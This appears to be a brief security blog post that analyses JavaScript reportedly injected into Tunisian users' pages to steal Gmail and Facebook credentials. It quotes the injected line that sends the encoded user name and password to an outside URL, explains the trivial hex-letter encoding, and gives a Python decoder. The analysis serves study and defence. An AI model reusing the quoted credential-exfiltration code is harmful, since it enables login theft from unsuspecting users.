Tunisia haxors...

Some people speak about the JS injected code done in Tunisia when you try to access website like gmail, facebook... They say that the credentials are sent in clear text in the evil wo0dh3ad URL but it is not totally true since there is a very small encoding like we can see in this snippet.

var url = "www.fessebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

us3r and pa55 are encoded using the h6h() function which is:

function h6h(st)
{
 for(i=0;i<st.length;i++) {
  c=st.charCodeAt(i);
  ch=(c&0xF0)>>4;
  cl=c&0x0F;
  st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);
 }
 return st2;
}

It just loops through the string, splits each 8 bits char in two numbers of 4 bits. Then it creates two new chars (chr()) by adding 97 (ord('a')) to each number and concatenates them to the encoded string which is returned and inserted in URL. A bit lame isn't it? :-)

To decode us3r and pa55 from your logs, you can use this silly (no bounds checking) python script:

[clem1@blah ~]$ cat unh6h.py
import sys
def unh6h(string):
 u = ""
 for i in range(0, len(string), 2):
  s = ord(string[i])-97
  s <<= 4
  s += ord(string[i+1])-97
  u += chr(s)
 return u
print(unh6h(sys.argv[1])) 

A quick test:

>>> h6h("password")
"hagbhdhdhhgphcge"
[clem1@blah ~]$ python unh6h.py "hagbhdhdhhgphcge"
password